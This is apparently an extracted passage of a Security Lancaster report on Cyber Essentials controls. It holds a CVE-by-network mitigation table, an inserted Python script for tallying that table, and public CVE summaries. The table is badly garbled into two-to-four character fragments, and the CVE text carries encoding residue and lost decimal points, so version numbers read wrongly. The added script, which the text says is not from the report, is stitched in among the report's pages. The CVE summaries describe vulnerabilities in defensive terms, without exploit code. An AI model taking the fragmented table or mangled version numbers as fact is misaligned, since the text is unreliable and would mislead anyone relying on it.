14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
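The applicability rows lend themselves to mechanical tallying. The script below is an added example, not code from the Security Lancaster report: it parses rows in the pipe-delimited layout used for the table above (a constructed subset of rows from the table is embedded as sample input), strips the bracketed qualifiers from control names so that "Secure Configuration (Secure Browser)" and "Secure Configuration" count as the same control, and then summarises the "With CE" verdicts, the controls credited for them, and each network's residual exposure once Cyber Essentials is applied. The network labels, the verdict strings and the helper names are this example's own assumptions.

```python
"""Summarise the Cyber Essentials (CE) applicability table.

Added illustration for this report's appendix, not code from the report.
SAMPLE is a constructed subset of rows copied from the table: CVE, the five
y/n applicability cells (SME1-SME4 and Idealised), the verdict without CE,
the verdict with CE, and the CE controls credited with the mitigation.
"""
import re
from collections import Counter

NETWORKS = ("SME1", "SME2", "SME3", "SME4", "Idealised")

# Constructed subset of the table, in the same pipe-delimited layout.
SAMPLE = """\
| CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install) |
| CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall |
| CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated | Firewall, Anti-DoS, Patch Management |
| CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Anti-Malware, Patch Management [Time Delay] |
"""

# Qualifiers such as "(Secure Browser)" or "[Time Delay]" refine a control
# rather than naming a different one, so they are stripped before counting.
QUALIFIER = re.compile(r"\s*[\(\[][^\)\]]*[\)\]]")


def parse_rows(text):
    """Parse pipe-delimited table rows; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 9 or not cells[0].startswith("CVE-"):
            continue
        applies = {net: flag.lower() == "y" for net, flag in zip(NETWORKS, cells[1:6])}
        names = QUALIFIER.sub("", cells[8])
        controls = [c.strip() for c in re.split(r"[,&]", names) if c.strip()]
        rows.append({"cve": cells[0], "applies": applies,
                     "no_ce": cells[6], "with_ce": cells[7], "controls": controls})
    return rows


def outcome_counts(rows, network=None):
    """Distribution of the 'With CE' verdict, optionally restricted to the
    CVEs that actually apply to one network."""
    return Counter(r["with_ce"] for r in rows
                   if network is None or r["applies"][network])


def control_counts(rows, verdict=None):
    """How often each CE control is credited, optionally only for rows
    that reached the given 'With CE' verdict."""
    return Counter(c for r in rows
                   if verdict is None or r["with_ce"] == verdict
                   for c in r["controls"])


def residual_exposure(rows):
    """Per network: (applicable CVEs, those CE does not fully mitigate)."""
    out = {}
    for net in NETWORKS:
        applicable = [r for r in rows if r["applies"][net]]
        residual = sum(1 for r in applicable if r["with_ce"] != "Mitigated")
        out[net] = (len(applicable), residual)
    return out


if __name__ == "__main__":
    rows = parse_rows(SAMPLE)
    print("With CE:", dict(outcome_counts(rows)))
    print("Controls credited:", dict(control_counts(rows)))
    print("Controls in partially mitigated rows:",
          dict(control_counts(rows, "Partially Mitigated")))
    for net, (n, residual) in residual_exposure(rows).items():
        print(f"{net}: {n} applicable, {residual} not fully mitigated with CE")
```

Feeding the script the full reconstructed table instead of SAMPLE gives the same summary over all rows; the "Partially Mitigated" breakdown is the interesting one, because it shows which controls (Patch Management above all) are credited even where the report judged CE insufficient on its own.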
CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.
CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".
CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help URL that triggers loading of hxds.dll.
